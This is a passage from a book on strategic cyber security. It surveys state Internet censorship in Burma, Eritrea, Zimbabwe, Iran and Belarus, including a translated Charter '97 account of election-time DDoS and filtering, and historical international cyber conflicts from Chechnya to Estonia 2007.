up to 15 years in prison. Burma’s State Peace and Development Council (SPDC) prohibits “writings related to politics,” “incorrect ideas,” “criticism of a non-constructive type,” and anything “detrimental to the ideology of the state” or “detrimental to the current policies and secret security affairs of the government.” Some international groups, such as Free Burma Coalition and BurmaNet, have cam- paigned for greater Internet freedom since 1996. But there is little resistance to Internet governance within Burma itself, due to its high level of political repression. 228 Voeux, 2006: The reporter stated that the names of the dissidents had asterisks and other punctuation marks between the letters of their names in an effort to make them illegible to government censorship software, but that “this precaution turned out to be insufficient.” However, it could be that the system was triggered by the source IP or email address of the Reporter Without Borders’ author of the email. 229 CIA World Factbook, 9 March, 2011. 68 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY Although Burma now has a population of 54 million, only around 110,000 of its citizens can connect to the web – around 0.2% - through a funnel of roughly 170 Internet-connected computers.230 In Africa, Eritrea has played an infamous role as the last country to go online and the first to go offline. In November 2000, Eritrea opened its first national gateway to the Internet, with a capacity of 512 Kbps.231 Within five years, about 70,000 people had accessed the web, mostly from a “walk-in” ISP. There was no initial censorship of the web, but in 2001, human rights in Eritrea began to deteriorate. In 2004, all cyber cafés were physically transferred to govern- ment “educational and research” centers. The official reason was to control pornog- raphy, but international diplomats are skeptical of this explanation. Historically, oral traditions in Africa have played a powerful role in fostering na- tional solidarity. Radio and clandestine radio stations in the Horn of Africa are skill- fully employed by both government and anti-government forces. One transmitter in the Sudan, for example, has hosted three separate anti-Eritrean radio stations simultaneously. Given the low level of Internet usage in Africa, political battles are slow to shift from the radio spectrum to cyberspace. However, via the web even the most paro- chial factions are able to appeal to the entire world, thereby creating international political and economic support for their cause. Sites such as Pan-African News and Eritrea Online offer a growing amount of information and analysis, and their influ- ence will only grow over time. Today, Eritrea has a population of around 6 million, of which only about 200,000 connect to the web.232 Two thousand miles to the south, the government of Zimbabwe is engaged in a deadly game of information warfare against its own citizens. In October 2006, President Robert Mugabe reportedly met with his Central Intel- ligence Organisation (CIO) for the purpose of infiltrating Zim Internet service pro- viders (ISP). Operatives were to “flush out” journalists using the Internet to send “negative” information to international media. The police worked as cyber café at- tendants and posed as web surfers. A police spokesman confirmed that the govern- ment would do “all it can” to prevent citizens from writing “falsehoods against the government.” Jail terms were up to 20 years in length. 230 CIA World Factbook, 9 March, 2011. 231 Kilobits per second. 232 CIA World Factbook, 9 March, 2011. 69 Cyber Security: Real-World Impact The Zim Interception of Communications Bill (ICB) forced ISPs to purchase special hardware and monitoring software from the government. No court challenges to government intercepts are allowed. Some ISPs threatened to shut down in protest. In terms of national telecommunications infrastructure, Zimbabwe has followed a similar path as other authoritarian governments, giving monopoly control to a state- controlled firm.233 The reason is simple – if one entity controls all gateways in and out of the country, surveillance is much easier, and the government can charge whatever price it desires. In many countries, a major challenge for the government is the speed with which millions of its citizens have connected to the web. In 2001, there were just 1 million Internet users in Iran; today that number has increased to over 8 million.234 Former president Ali Mohammad Khatami stated that the Iranian government has tried to have the “minimum necessary” control over the Internet. Moreover, while Muslim values are emphasized, only sites that are “truly insulting” towards Islam are censored, and political opposition sites are accessible. However, the OpenNet Initiative estimates that about one-third of all Internet sites, most often relating to politics, pornography, translation, and anonymizing software, are blocked by the Iranian government. Websites are more likely to be blocked if they are in Farsi than in English. In fact, in Iran it is technically illegal to access “non- Islamic” websites, and the maximum penalties for doing so include severe punish- ments. In addition, Iranian ISPs are required to install web- and email-filtering tools. Human rights groups, such as Reporters Without Borders, argue that since 2006 all Iranian websites have had to register with the authorities to demonstrate that they do not contain prohibited content. And many popular international sites, such as photo-sharing FlickR and video-sharing YouTube, are inaccessible for reasons of “immorality.”235 Iranian media publications are not legally allowed to contradict government goals. Media receive a list of banned subjects each week, and there is a dedicated press court. On March 14, 2011, UN secretary-general Ban Ki-moon stated that he was “deeply troubled by reports of increased executions, amputations, arbitrary arrests, unfair trials, and possible torture and ill-treatment of human rights activists, lawyers, jour- nalists, and opposition activists” in Iran. No UN human rights investigators have been allowed to visit the country since 2005. Since June 12, 2009, about 20 foreign 233 The state-owned provider in Zimbabwe is Tel*One. 234 Iran has a population of almost 80 million, 18th on the world list, but it has just 120,000 Internet- connected computers, good for 75th in the world (CIA World Factbook, 9 March, 2011). 235 Handbook..., 2008. 70 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY journalists and correspondents have been expelled from Iran. A dozen were stripped of their press cards following a demonstration in February 2011 that was organized to support the revolution in Egypt. Abdolreza Tajik, the 2010 RSF-FNAC press free- dom prize recipient, was given a six-year jail term.236 During the early-2011 unrest across the Middle East, Iranian authorities increased surveillance in cyberspace. In order to obstruct anti-government protests in Feb- ruary 2011, independent and pro-opposition websites, including www.fararu.com and sahamnews.org, were blocked. Prior to anti-regime demonstrations, broadband speed has slowed down enormously. Mobile phone and text-message traffic was disrupted. Satellite TV broadcasts, especially relating to news about the revolution in Egypt, were jammed. Finally, in an effort to reduce the number of calls for protest, the name of the Persian month “bahman” (roughly corresponding to February 2011) was censored.237 Iranian citizens are Internet savvy, and this should hinder government attempts to control Iranian cyberspace in the future. Since 2000, blogging has become both a mainstream and an alternative form of communication, and even President Mahmud Ahmadinejad has his own blog. In August 2004, when a number of reformist news sites were blocked, their content was quickly mirrored on other domains. An anony- mous system administrator posted an alleged official blacklist of banned sites. And reformist Iranian legislators have openly complained about censorship, even post- ing their criticisms online. In the Internet age, the power of communications within civil society to overwhelm government stability has risen to new heights. In a classic coup d’état, the national television, radio station and printing press were among the first paramilitary objec- tives. But the Internet has changed the rules of the game. Now anyone who owns a personal computer and a connection to the Internet possesses both a printing press and a radio transmitter in their own home. Furthermore, the entire world is potentially their audience. Authoritarian governments, within their borders, will attempt to pare down the In- ternet to a manageable size, both in terms of physical infrastructure (e.g., no un- monitored Internet cafes) and information content (censorship). Common laws gov- 236 “Human rights investigators...” 2011. 237 “Regime steps up censorship...” 2011. 71 Cyber Security: Real-World Impact erning information and communications technology (ICT) are likely to include the following: • all Internet accounts must be officially registered with the state, • all Internet activity must be directly attributable to individual accounts, • users may not share or sell Internet connections, and • users may not encrypt their communications. Clearly the Internet is a powerful tool in the hands of a despot. Through a monop- oly of state-owned and operated telecommunications, the government can conduct country-wide and international ICT surveillance,238 including information manipula- tion, even with some plausible deniability. Further, the government has an effective means to deliver political messages directly to its citizens, while at the same time denying that opportunity to rival political factions. Thus, network security designed for law enforcement purposes can be used not only to catch criminals but also to target political adversaries. A challenge for any government – including those run by dictators – is to find a balance between too much and too little freedom of information. Although govern- ments must be given appropriate law enforcement powers, there may be tempta- tions to abuse them, and risks will follow. Governments like those in North Korea are doomed to fail eventually. The Internet – and human beings – thrive on the open exchange of information. If civil society is not given sufficient freedom to flourish, the regime will die. In the Internet era, choking online freedom likely also entails choking long-term economic prospects, which will in turn threaten political stability. In the next chapter, the author has translated a first-person account, written in Rus- sian by a Belarusian computer expert, which examines the ongoing battle in cyber- space between government authorities and civil society in Belarus. 238 For the international communications that do not begin or end on its national territory, but still need to traverse it. 72 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY Case Study: Belarus239 Foreword by Kenneth Geers240 Life in Belarus has not changed much since the Cold War. In 2001, U.S. Secretary of State Colin Powell called its autocratic President, Alexander Lukashenko, Europe’s “lone outlaw.”241 The Belarusian Presidential Administration directly controls nearly all media within the country.242 There are fewer than 10 professional quality printing presses outside of state control.243 Television and radio stations try to avoid news programming alto- gether – for fear of losing their license – and even Russian TV is heavily censored.244 In 2005, Freedom House ranked only Turkmenistan lower than Belarus in terms of democracy among the countries of the former Soviet Union.245 The state-owned Beltelecom monopoly is the sole provider of telephone and Internet connectivity, although about 30 national ISPs connect through Beltelecom. The only reported independent Internet link is via the government’s academic and research network, BasNet. Strict government controls are enforced on all telecommunica- tions technologies; for example, transceiver satellite antennas and IP telephony are prohibited. Beltelecom has been accused of “persecution by permit” and of requiring a demonstration of political loyalty to access its services. At least one Belarusian journalist is reported to have “disappeared.”246 As in Zimbabwe, the Beltelecom monopoly status is intended not only for govern- ment oversight, but also to maximize financial gain. It is the primary source of rev- enue for the Ministry of Communications (MIC).247 The State Center for Information Security (GCBI), in charge of domestic signals intel- ligence (SIGINT), controls the “.by” Top Level Domain (TLD) and thus manages both the national Domain Name Service (DNS) and website access in general. Formerly 239 Following the Foreword, this chapter is a translation by the author of a Russian language paper writ- ten by Fedor Pavluchenko of www.charter97.org, entitled “Belarus in the Context of European Cyber Security,” which was presented at the 2009 Cooperative Cyber Defence Centre of Excellence Confer- ence on Cyber Warfare. 240 This chapter Foreword is taken from: Geers, 2007a. 241 Kennicott, 2005. 242 Usher, 2006. 243 Kennicott, 2005. 244 “The Internet and Elections...,” 2006. 245 Kennicott, 2005. 246 “The Internet and Elections...,” 2006. 247 Ibid. 73 Cyber Security: Real-World Impact part of the Belarusian KGB, GCBI reports directly to President Lukashenko.248 De- partment “K” (for Кибер or Cyber), within the Ministry of Interior, has the lead in pursuing cyber crime. A common media offense in Belarus is defaming the “honor and dignity” of state officials249. Belarus already has a significant history of political battles in cyberspace. In 2001, 2003, 2004, and 2005, Internet access problems were experienced by websites that were critical of the President, state referenda, and/or national elections. While the government announced that website availability problems were the result of access “overload,” the opposition countered that the sites were inaccessible altogether, and that the regime was deliberately blocking access. One of the affected sites had been characterized by the Ministry of Foreign Affairs as “political pornography”.250 The biggest cyber showdown took place during the March 2006 Belarusian presi- dential elections, during which the opposition tried to use its youth and computer savvy to organize in cyberspace. The sitting government attempted the same, but because its supporters consisted of many rural and elderly voters who were still unconnected or new to the Internet, its efforts were uphill at best.251 Election Day 2006 provided the world an infamous example of modern-day cyber politics. As Belarusians went to the polls on March 19, thirty-seven opposition me- dia websites were inaccessible from Beltelecom.252 “Odd” DNS (Internet address) er- rors were reported, and the website of the main opposition candidate, Aleksandr Milinkevich, was “dead.” President Lukashenko won the election by a wide margin. A week later, as anti- government protestors clashed with riot police, the Internet was inaccessible from Minsk telephone numbers. A month later, when an opposition “flash-mob” was or- ganized over the Internet, arriving participants were promptly arrested by waiting policemen.253 Similar to Iran, a primary lesson from Belarus is that Internet filtering and govern- ment surveillance do not have to be comprehensive to be effective. Selective target- ing of known adversaries and increased computer network operations at critical points in time, such as during elections, can be very useful to a sitting government. 248 Ibid. 249 Kennicott, 2005.; and “Press Reference: Belarus.” 250 “The Internet and Elections...,” 2006. 251 Ibid. 252 The OpenNet Initiative confirmed that 37 of 197 tested websites were inaccessible from the Beltele- com network, but were still accessible from other computer networks. 253 Ibid. 74 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY “Belarus in the Context of European Cyber Security” Written in Russian by Fedor Pavluchenko (www.charter97.org) Translated to English by Kenneth Geers During the first decade of the 21st century, Internet censorship in Belarus has become a government tool used to combat political dissent. This ongoing cyber conflict between state and non-state actors is similar to the struggle between the Russian government and its domestic adversaries in cyberspace. State-sponsored, politically-motivated Denial of Service (DDoS) attacks against civil society are unacceptable. In Belarus, this violation of freedom of expression has become a national crisis. But the problem is not confined within these borders; it threatens the integrity of Internet resources in other European countries as well. Modern technology offers the world significantly improved communications, but it also creates novel threats. Governments can abuse their power over state-controlled infrastructures. This not only violates human rights, but it engenders long-term political instability. Democratic states in Europe should work to strengthen inde- pendent Internet institutions and extend the rule of law to the whole of European cyberspace. Alexander Lukashenko has governed Belarus as an autocrat since a disputed politi- cal referendum in 1996. His government has suppressed freedom of speech, and for over a decade there has been virtually no independent media in Belarus. The popular newspapers of the 1990s have ceased to exist or have seen their circulation greatly reduced, and independent radio stations have been closed. Sadly, there has never been an independent Belarusian television channel. The Internet, despite its high cost in Belarus, has unsurprisingly become the only source of objective information for the majority of the citizens. The number of web users has now grown to nearly one-quarter of the country’s population. The Charter ‘97 website has been a leading Belarusian venue for public policy dis- cussion for over a decade. However, because Charter ‘97 is known for siding with Be- larusian political dissidents, the site has been the target of myriad state-sponsored Internet information-blocking strategies. September 9, 2001: Belarusian Internet users discovered the power of a govern- ment to wage cyber warfare against its own citizens on the day of its own national presidential elections. At 1200, Beltelecom blocked access to many popular political websites. Although the prohibited sites remained accessible outside Belarus, no one in Belarus could view them until the following afternoon at 1600, when the Internet “filtering” stopped. 75 Cyber Security: Real-World Impact From a technical perspective, this type of Internet censorship is easy for a telecom- munications monopoly to perform. The data packets can be filtered at a government Internet Service Provider’s (ISP) network router, based solely on the Internet Proto- col (IP) address of the websites in question. However, it can be equally simple for an Internet user or the censored website to un- derstand exactly what is happening. For example, the “traceroute” computer network utility, which measures the paths and transit times of packets across networks, can be used to spot the exact point of network interruption. Some of the prohibited sites were hosted on servers in Belarus, within the “.by” Top Level Domain (TLD). These sites were disabled by altering their Domain Name Service (DNS) records to make them inaccessible. This is possible because “.by” is administered by the Operations and Analysis Center, a special state agency that falls under the direct control of the Belarusian President. On September 9, 2001, the fol- lowing domains were unreachable on the Belarusian web: home.by, minsk.by, org.by, unibel.by, nsys.by, and bdg.by. Numerous websites, including www.charter97.org, responded by creating “mirrors” or copies of their content at other web addresses in an effort to stay online. All such mirrors were promptly blocked by the government. Furthermore, websites that specialize in obscuring the source and destination of web searches, such as “ano- nymizers” and “proxy” servers, were also blocked. In all, over 100 websites were inaccessible. It is important to note that within Belarusian law there were no legal grounds to perform censorship of political content on the web. What happened in 2001 directly violated the constitution. Beltelekom and the Belarus Ministry of Communications both announced that the outage stemmed from too many Belarusians trying to ac- cess the affected sites at the same time, and that this led to a self-inflicted Denial of Service. But this story is easy to disprove via simple technical analysis. For its part, Belarusian government leadership had no comment, even though Inter- net censorship and computer sabotage are an offense under Belarusian law. Further- more, there was never any official investigation into the facts of this case. October 24, 2001: The Charter ’97 website was completely deleted from its web server by an unidentified computer hacker. A few days after the attack, under pres- sure from the Belarusian secret services, our hosting company broke the terms of our contract. www.charter97.org was no longer allowed space on its server. January 20, 2004: For the first time, Charter ’97 was the target of a Distributed Denial of Service (DDoS) attack. The DDoS followed our publication of a journalistic investigation into a possible connection between high-ranking officials from the Be- 76 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY larusian Interior Ministry – which is responsible for investigating computer crimes – and the trading of online child pornography. The DDoS attack lasted more than three weeks and was supported by a botnet that comprised more than 55,000 active IP addresses. This network of infected comput- ers spanned the globe and included machines in Latin America, the United States, South-East Asia, China, and India. The source IPs and intensity of the attack changed several times, which indicated an active command and control (C2) over the activity. Of course, it is impossible to prove that the DDoS attack was politically motivated, but external simultaneous factors corroborate this theory. On state television, a campaign of harassment targeted the employees of Charter ’97. Among other things, the employees themselves were accused of trading in online pornography. In addi- tion, Natalya Kolyada, a human rights activist working with the site, was convicted on misdemeanor charges. July 14-21, 2004: On July 14, for 2 hours, a cyber attack paralyzed the server that hosted the Charter ’97 website. It is believed that this event was a “test” to facilitate what happened one week later. On July 21, there were mass protests in Minsk to demonstrate against the 10th anni- versary of the Lukashenko government. Charter ’97 had planned to host a webcast in support of the protests. For the second time, the website came under a DDoS- attack, which began at 1400 – 4 hours before the demonstrations began – and lasted until the political protests were over. This DDoS bore strong similarities to the first attack in January of 2004. October 10, 2004: The next large-scale attempt to block Charter ’97 and other in- dependent websites occurred during parliamentary elections and a simultaneous referendum on whether to lift presidential term limits in Belarus. On the day before the election, news correspondents were not only unable to access the website, but they could not telephone Charter ’97 by mobile or landline phone. In addition, other political opposition websites were again blocked by a filter on Beltele- kom’s primary router. However, many Belarusian web users were better prepared for this attack and immediately switched to Internet proxies and anonymizers. Unfortunately, the government had a new, effective cyber weapon in its arsenal: the artificial stricture – or “shaping” – of Internet bandwidth. The use of this tactic meant that, in principle, forbidden sites were still available, but it took anywhere from 5-10 minutes for their pages to load in a browser. Thus, web users were simply unable to gain full access to Charter ’97 and other targeted sites. Non-political Inter- net resources were accessible as normal. 77 Cyber Security: Real-World Impact Neither the Ministry of Communications nor Beltelekom made any announcement regarding this incident, and no official investigation was undertaken. March 19, 2006: The next time that Belarusian websites were blocked was during the 2006 presidential elections. Anticipating the government’s strategy, Charter ’97 well before the election took place offered its visitors numerous ways to circumvent censorship in an initiative called “Free Internet.” Due in part to those efforts, Beltele- kom’s IP-filtering failed. However, its network “shaping,” or the selective starvation of specific streams of bandwidth, was again successfully employed. On March 18, the day before the election, a censorship “test” was conducted from 1600-1630. On election day, the sites of opposition presidential candidates, politi- cal parties, leading independent news sources, and the international blogging site www.livejournal.com, which is very popular with Belarusians, were all successfully blocked. Beltelekom announced that the service interruptions were caused by too many users trying to connect to the affected sites, but no formal investigation was undertaken. April 25-26, 2008: On the eve of massive street protests in Minsk, which Charter ’97 had intended to broadcast via live webcast, the website suffered a DDoS-attack that paralyzed its server. This was another “test,” which lasted 30 minutes.254 On April 26 – the day of the planned demonstration – the real DDoS attack began, five hours before the start of the protest. The hosting company, www.theplanet.com, was overwhelmed. Its hardware was designed to carry up to 700 Mbit/s of network traffic, but the DDoS surpassed 1 Gbit/s.255 There was no alternative but to turn off the website and simply wait for the attack to end (on the following day). Other independent online media were targeted simultaneously, including the Be- larusian-language version of “Radio Liberty.” A server hosting the opposition site, “Belarusian Partisan,” for several days came under the control of unknown hackers, who used it as a platform to publish fabricated, scandalous news stories which Be- larusian Partisan editors were forced to refute on other websites. The high level of expertise required for this attack strongly suggested the involvement of Belarusian intelligence agencies. The technical defense capabilities of the Radio Liberty server – home to its Belaru- sian, Albanian, Azerbaijani, Tajik, and Russian services – were sufficient to withstand the attack for more than 3 days. The site remained accessible, but was nonetheless 254 For about 10 minutes, the site was difficult to access, but normal traffic was restored before the attack ended. The following IP addresses were used in the attack: 89.211.3.3, 122.169.49.85, 84.228.92.1, 80.230.222.107, 212.34.43.10, 81.225.38.110, 62.215.154.167, and 62.215.117.15. 255 Megabits per second/gigabits per second. 78 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY difficult to reach, and this caused a minor diplomatic scandal. The U.S. mission to the Organization for Security and Cooperation in Europe (OSCE) issued a statement condemning the cyber attack. The Belarusian Ministry of Foreign Affairs denied any involvement. June 8, 2009: The most recent example of a politically-motivated DDoS attack on Charter ’97 occurred during a political row between the governments of Russia and Belarus, which resulted in the imposition of Russian economic sanctions against Belarus and a worsening of the political situation inside Belarus itself. The cyber attack lasted more than a week, and for a while it paralyzed the site com- pletely. The strength of the DDoS in this case was not particularly high; only around five thousand IP addresses took part in it. In cooperation with our ISP, the Charter ‘97 technical support staff was able to neutralize the attack. Countermeasures and their effectiveness: Charter ’97 is constantly looking for ways to counter government censorship, but there is no foolproof solution. The situ- ation in Belarus is best described as an effort to outmaneuver an opponent who has vastly more resources than they do. Over time, Charter ’97 has found some answers in technology and in cyber security expertise. They moved their site to a relatively powerful, hardened server,256 built an intrusion detection system, and constantly monitor vulnerabilities. They use en- cryption to access both the server and the site’s content management system. They have multi-tiered levels of access to both the server and the site, and they are able to quickly replace all passwords in the event administrators and/or journalists are ar- rested. They have a distributed system for creating server data backups. Moreover, they have endeavored to master simple, open-source technologies such as UNIX, PHP, and MySQL.257 All told, these efforts go a long way toward preventing the com- promise of the web server. Charter ’97 also launched the “Free Internet” project, which provides recommen- dations to visitors in case the site becomes unavailable. It explains how to use an Internet proxy, anonymizers, Virtual Private Networks (VPN), and software such as Tor.258 This information is rebroadcast via RSS259 and mirror websites, and visi- tors are encouraged to disseminate it through their own blogs, chat rooms, social networking, etc. These measures are sufficient to overcome simple IP blocking, but there is still no solid countermeasure to DDoS, especially with limited resources. 256 Firewall and caching technologies are sufficient to repulse DDoS-attacks of average strength. 257 This helps with site mobility (i.e. the rapid transfer of our site to another hosting platform). 258 The Onion Router or the Tor anonymity network. 259 Really Simple Syndication. 79 Cyber Security: Real-World Impact Charter ’97 believes that the government’s most effective methods of censorship are DoS attacks and various kinds of information manipulation. For the latter, intel- ligence operatives can insert themselves into ongoing discussions on the web in order to monitor or even “guide” conversations. If and when the political dialogue rises above a certain threshold, especially during politically sensitive points in time, the authorities can take action. Government power, cyber crime, and the future: The current Belarusian govern- ment suppresses political dissent on the Internet and flagrantly violates its own constitution. There is no legal basis for Internet censorship at all, much less for state- sponsored computer hacking and DoS attacks. Furthermore, such attacks could be used to block any kind of information. The result is the absence of the rule of law within the Belarusian Internet space, and a situation in which organized, state-spon- sored cyber crime could flourish, not only in Belarus but also beyond its borders. There is active cooperation between Belarusian and Russian intelligence agencies in cyberspace, as specified in the Agreement on Cooperation of the Commonwealth of Independent States (CIS) in Combating Cybercrime, signed in 2000. And there are strong similarities between attacks on Estonia, Georgia, and the websites of human rights organizations in Belarus and Russia. These Internet crimes share common characteristics and appear to have common roots. Civil society is threatened throughout Eastern Europe: in Belarus, Ukraine, Russia, Georgia, Armenia, and Azerbaijan, governments have likely used DoS attacks as a tool for suppressing political dissent. In response, a multinational, collaborative approach is required. A good start would be the creation of an international web hosting platform designed to support free- dom of speech throughout Europe. It should be built by a team of international experts, who could improve defenses and investigate attacks based on aggregate data. Privacy must of course be balanced with legitimate law enforcement powers, but the mere creation of an international platform would enhance cyber security and freedom of expression in Europe, especially during important events such as national elections. 80 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY International Conflict in Cyberspace Chapter 4 has demonstrated that many governments already perceive a clear con- nection between cyber security and internal political security. But what about inter- national conflict? To what extent can nation-states threaten their peers, and even defeat their rivals, in cyberspace? In fact, all international political and military conflicts now have a cyber dimension, the size and impact of which are difficult to predict. Today, practically everything that happens in the “real world” is mirrored in cyberspace, and for national security planners this includes propaganda, espionage, and – to an unknown but increasing extent – warfare itself. The Internet’s ubiquitous and unpredictable characteristics can make the battles fought in cyberspace just as important, if not more so, than events taking place on the ground. A brief analysis of current events proves that international cyber con- flict is already commonplace. Here are five illustrative examples that suggest it is no longer a question of whether computer hackers will take world leaders by surprise, but when and under what circumstances. Chechnya 1990s: Propaganda In the Internet era, unedited news from a war front can arrive in real-time. As a result, Internet users worldwide play an important role in international conflicts simply by posting information, in either text or image format, to a website. Since the earliest days of the World Wide Web, Chechen guerilla fighters, armed not only with rifles but with digital cameras and HTML, have clearly demonstrated the power of Internet-enabled propaganda. Since the earliest days of the World Wide Web, pro-Chechen and pro-Russian forces have waged a virtual war on the Internet, simultaneous with their conflict on the ground. The Chechen separatist movement in particular is considered a pioneer in the use of the Web as a tool for delivering powerful public relations messages. The skillful placement of propaganda and other information, such as the number to a war funds bank account in Sacramento, California, helped to unite the Chechen diaspora.260 260 Thomas, 2002. 81 Cyber Security: Real-World Impact The most effective information, however, was not pro-Chechen, but anti-Russian. Digital images of bloody corpses served to turn public opinion against perceived Russian military excesses. In 1999, just as Kremlin officials were denying an inci- dent in which a Chechen bus was attacked and many passengers killed, images of the incident appeared on the Web.261 As technology progressed, Internet surfers watched streaming videos of favorable Chechen military activity, such as ambushes on Russian military convoys.262 The Russian government admitted the need to improve its tactics in cyberspace. In 1999, Vladimir Putin, then Russia’s Prime Minister, stated that “we surrendered this terrain some time ago ... but now we are entering the game again.” Moscow sought the help of the West in shutting down the important pro-Chechen kavkaz.org web- site, and “the introduction of centralized military censorship regarding the war in the North Caucasus” was announced.263 During the second Chechen war (1999-2000), Russian officials were accused of es- calating the cyber conflict by hacking into Chechen websites. The timing and so- phistication of at least some of the attacks suggested nation-state involvement. For example, kavkaz.org (hosted in the U.S.) was reportedly knocked offline simultane- ously with the storming by Russian special forces of a Moscow theater under siege by Chechen terrorists.264 Kosovo 1999: Hacking the Military In globalized, Internet-era conflicts, anyone with a computer and a connection to the Internet is a potential combatant. NATO’s first major military engagement followed the explosive growth of the Web during the 1990s. Just as Vietnam was the world’s first TV war, Kosovo was its first broad-scale Internet war. As NATO planes began to bomb Serbia, numerous pro-Serbian (or anti-Western) hacker groups, such as the “Black Hand,” began to attack NATO Internet infrastruc- ture. It is unknown whether any of the hackers worked directly for the Yugoslav military. Regardless, their stated goal was to disrupt NATO’s military operations.265 The Black Hand, which borrowed its name from the Pan-Slavic secret society that helped to start World War I, claimed it could enumerate NATO’s “most important” computers, and that through hacking it would attempt to “delete all the data” on 261 Goble, 1999. 262 Thomas, 2002. 263 Goble, 1999. 264 Bullough, 2002. 265 “Yugoslavia...” 1999. 82 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY them. The group claimed success on at least one U.S. Navy computer, and stated that it was subsequently taken off-line.266 NATO, U.S., and UK computers were all attacked during the war, via Denial-of-Service and virus-infected email (twenty-five different strains of viruses were detected).267 In the U.S., the White House website was defaced, and a Secret Service investigation ensued. While the U.S. claimed to have suffered “no impact” on the overall war effort, the UK admitted to having lost at least some database information.268 At NATO Headquarters in Belgium, the attacks became a propaganda victory for the hackers. The NATO public affairs website for the war in Kosovo, where the or- ganization sought to portray its side of the conflict via briefings and news updates, was “virtually inoperable for several days.” NATO spokesman Jamie Shea blamed “line saturation” on “hackers in Belgrade.” A simultaneous flood of email successfully choked NATO’s email server. As the organization endeavored to upgrade nearly all of its computer servers, the network attacks, which initially started in Belgrade, began to emanate from all over the world.269 Middle East 2000: Targeting the Economy During the Cold War, the Middle East often served as a proving ground for military weapons and tactics. In the Internet era, it has done the same for cyber warfare. In October 2000, following the abduction of three Israeli soldiers in Lebanon, blue and white flags as well as a sound file playing the Israeli national anthem were planted on a hacked Hizballah website. Subsequent pro-Israeli attacks targeted the official websites of military and political organizations perceived hostile to Israel, including the Palestinian National Authority, Hamas, and Iran.270 Retaliation from Pro-Palestinian hackers was quick and much more diverse in scope. Israeli political, military, telecommunications, media, and universities were all hit. The attackers specifically targeted sites of pure economic value, including the Bank of Israel, e-commerce, and the Tel Aviv Stock Exchange. At the time, Israel was more wired to the Internet than all of its neighbors combined, so there was no shortage of targets. The “.il” country domain provided a well-defined list that pro-Palestinian hackers worked through methodically. 266 Ibid. 267 “Evidence...” 1999. 268 Geers, 2005. 269 Verton, 1999. 270 For example, the Zone-H website lists 67 such defacements from pro-Israeli hacker m0sad during this time period. 83 Cyber Security: Real-World Impact Wars often showcase new tools and tactics. During this conflict, the “Defend” DoS program was used to great effect by both sides, demonstrating in part that software can be copied more quickly than a tank or a rifle. Defend’s innovation was to con- tinually revise the date and time of its mock Web requests; this served to defeat the Web-caching security mechanisms at the time.271 The Middle East cyber war demonstrated that Internet-era political conflicts can quickly become internationalized. For example, the Pakistan Hackerz Club penetrat- ed the U.S.-based pro-Israel lobby AIPAC and published sensitive emails, credit card numbers, and contact information for some of its members.272 The telecommunica- tions firm AT&T – clearly an international critical infrastructure service provider to all sectors of the world economy – was targeted for providing technical support to the Israeli government during the crisis.273 Since 2000, the Middle East cyber war has generally followed the conflict on the ground. In 2006, as tensions rose on the border between Israel and Gaza, pro-Pal- estinian hackers shut down around 700 Israeli Internet domains, including those of Bank Hapoalim, Bank Otsar Ha-Hayal, BMW Israel, Subaru Israel, and McDonalds Israel.274 U.S. and China 2001: Patriotic Hacking On April 26, 2001, the Federal Bureau of Investigation’s (FBI) National Infrastruc- ture Protection Center (NIPC) released Advisory 01-009: “Citing recent events between the United States and the People’s Republic of China (PRC), malicious hackers have escalated web page defacements over the Internet. This communication is to advise network administrators of the potential for in- creased hacker activity directed at U.S. systems .... Chinese hackers have publicly discussed increasing their activity during this period, which coincides with dates of historic significance in the PRC....”275 Tensions had risen sharply between the two countries following the U.S. bombing of the Chinese embassy in Belgrade in 1999, the mid-air collision of a U.S. Navy plane with a Chinese fighter jet over the South China Sea in 2001, and the prolonged de- tainment of the American crew in the PRC. 271 Geers & Feaver, 2004. 272 “Israel...” 2000. 273 Page, 2000. 274 Stoil & Goldstein, 2006. 275 “Advisory 01-009...” 2001. 84 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY Hackers on both sides of the Pacific, such as China Eagle Alliance and PoizonB0x, began wide-scale website defacement and built hacker portals with titles such as “USA Kill” and “China Killer.” When the cyber skirmishes were over, both sides claimed defacements and DoSs in the thousands.276 The FBI investigated a Honker Union of China (HUC), 17-day hack of a California electric power grid test network that began on April 25th.277 The case was widely dismissed as media hype at the time, but the CIA informed industry leaders in 2007 that not only is a tangible hacker threat to such critical infrastructure possible, it in fact has already happened.278 On the anniversary of this cyber war, as businesses were bracing for another round of hacking, the Chinese government is said to have successfully called for a stand- down at the last minute, suggesting that Chinese hackers may share a greater de- gree of coordination than their American counterparts.279 Estonia 2007: Targeting a Nation-State On April 26, 2007, the Estonian government moved a Soviet World War II memo- rial from the center of its capital to a military cemetery. The move inflamed public opinion both in Russia and among Estonia’s Russian minority population. Beginning on April 27, Estonian government, law enforcement, banking, media, and Internet infrastructure endured three weeks of cyber attacks, whose impact still generates immense interest from governments around the world. Estonians conduct over 98% of their banking via electronic means. Therefore, the impact of multiple Distributed Denial-of-Service (DDoS) attacks, which severed all communications to the Web presence of the country’s two largest banks for up to two hours and rendered international services partially unavailable for days at a time, is obvious. Less widely discussed, but likely of greater consequence – both to national security planners and to computer network defense personnel – were the Internet infrastruc- ture (router) attacks on one of the Estonian government’s ISPs, which disrupted government communications for a “short” period of time.280 276 Wagstaff, 2001; Allen & Demchek, 2003. 277 Weisman, 2001. 278 Nakashima & Mufson, 2008. 279 Hess, 2002. 280 This case-study relies on some data available exclusively to CCD-CoE. 85 Cyber Security: Real-World Impact On the propaganda front, a hacker defaced the Estonian Prime Minister’s political party website, changing the homepage text to a fabricated government apology for having moved the statue, along with a promise to move it back to its original loca- tion. Diplomatic interest in the Estonia case was high, in part due to the possible reinter- pretation of NATO’s Article 5, which states that “an armed attack against one [Alli- ance member]... shall be considered an attack against them all.”281 Article 5 has been invoked only once, following the terrorist attacks of September 11, 2001. Potentially, it could one day be interpreted to encompass cyber attacks as well. For many observers, the 2007 denial-of-service attacks in Estonia demonstrated a clear “business case” cyber attack model against an IT-dependent country. The crisis significantly influenced the 2010 debate over NATO’s new Strategic Concept, when cyber security assumed a much higher level of visibility in international security dialogue, ranking alongside terrorism and ballistic missiles as a primary threat to the Alliance.282 To summarize Part II of this book, the world has witnessed the transformation of cyber security 